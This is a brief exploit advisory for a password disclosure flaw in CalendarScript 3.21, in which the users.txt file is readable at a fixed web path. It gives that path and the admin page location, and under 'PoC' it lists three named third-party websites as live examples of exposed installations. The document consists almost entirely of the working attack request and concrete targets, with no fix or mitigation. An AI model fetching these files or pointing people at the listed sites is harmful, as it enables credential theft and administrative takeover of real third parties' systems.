[+] Password Disclosure on CalendarScript 3.21
[+] Date: 28/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.calendarscript.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: users.txt
[+] Version: 3.21
[+] Exploit : http://host/calendar/calendarscript/users.txt
[+] PoC: http://www.kcreggae.org/Calendar/calendarscript/users.txt
         http://fangmichael.com/cgi-bin/calendar/calendarscript/users.txt
         http://www.theoldironsides.com/calendar/calendarscript/users.txt
[+] Admin page: http://host/calendar/calendar_admin.pl